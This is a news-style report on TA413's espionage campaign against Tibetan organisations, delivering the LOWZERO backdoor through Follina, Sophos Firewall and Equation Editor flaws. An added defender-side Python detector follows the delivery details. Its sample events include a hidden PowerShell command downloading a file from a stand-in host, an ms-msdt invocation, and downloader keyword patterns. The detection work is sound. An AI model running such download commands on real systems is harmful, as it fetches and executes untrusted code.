A Chinese-affiliated APT group called TA413 has exploited recently revealed vulnerabilities in MS Office and Sophos Firewall to deliver a newly discovered payload, the LOWZERO backdoor.
Researchers claimed that the introduction of this new backdoor is part of an espionage campaign against Tibet-linked organisations. Based on reports, the primary targets of the espionage hackers have been organisations with links to the Tibetan community, especially the Tibetan government-in-exile.
The intrusions involved exploitation of the Follina flaw and CVE-2022-1040, remote code execution vulnerabilities in MS Office and Sophos Firewall respectively. According to the researchers, the Chinese-backed hackers are quick to adopt new TTPs for initial access in order to rapidly execute their attacks against Tibet.
The LOWZERO backdoor was developed by its authors solely to attack the Tibetan community.
Based on reports, TA413 has consistently been attacking the Tibetan community since 2020 using multiple sets of payloads such as FriarFox, ExileRAT, and Sepulcher. Today, the LOWZERO backdoor is the newest addition to the group’s cyberespionage toolset.
The cyberespionage group’s exploitation of the Follina vulnerability was discovered in June this year. At the time, researchers had not identified the purpose of that exploitation; it has now become clear why the group abused the flaw.
TA413 also used spear-phishing in May. That attack delivered a malicious RTF document that exploited several flaws in the MS Equation Editor to deploy the custom LOWZERO backdoor implant.
Another phishing email sent to a Tibetan entity in May carried a Word attachment hosted on the Google Firebase service. It attempted to leverage the Follina flaw to run a PowerShell command that downloads the backdoor from a remote server.
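As an added defender-side illustration (not code from the article or from the researchers' report), the Python below flags process-creation events that match the two delivery chains described above: an Office application launching msdt.exe through the ms-msdt handler (the Follina pattern), Equation Editor (EQNEDT32.EXE) spawning a child process, and an Office application spawning a PowerShell downloader. The sample events are constructed, and the event field layout and download keywords are assumptions.

```python
import ntpath
import re

# Office hosts that should never spawn msdt.exe or a downloading shell.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed indicators of a command line fetching remote content.
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|https?://", re.I)

# Constructed sample events (parent image, child image, child command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\msdt.exe",
     "msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param <elided>"),
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
     "'https://example.invalid/x.bin','C:\\Users\\Public\\x.bin')"),
    # Benign: Word loading Equation Editor as a COM server, no further child.
    (r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "EQNEDT32.EXE -Embedding"),
    # Suspicious: Equation Editor itself spawning a shell.
    (r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c <elided>"),
    # Benign: an admin script started from Explorer.
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
]


def classify(parent, child, cmdline):
    """Return an alert label for one event, or None when it looks benign."""
    p = ntpath.basename(parent).lower()
    c = ntpath.basename(child).lower()
    if p in OFFICE_APPS and c == "msdt.exe" and "ms-msdt" in cmdline.lower():
        return "follina: Office spawned msdt.exe via the ms-msdt handler"
    if p == "eqnedt32.exe":
        return "equation-editor: EQNEDT32.EXE spawned a child process"
    if p in OFFICE_APPS and c in SHELLS and DOWNLOAD_RE.search(cmdline):
        return "office-downloader: Office spawned a shell that fetches remote content"
    return None


def scan(events):
    """Return (event index, label) pairs for every event that trips a rule."""
    return [(i, lbl) for i, (p, c, cl) in enumerate(events) if (lbl := classify(p, c, cl))]


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```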
Analysts explained that the LOWZERO backdoor can receive additional commands from its C2 server if the compromised device is of interest to the threat group.
Cybersecurity experts stated that the group continues to add new capabilities while still relying on tried-and-tested TTPs. Unfortunately, TA413’s use of both zero-day and publicly disclosed vulnerabilities implies that it will adopt any technique that proves useful for its cyberespionage campaign against its targeted organisations.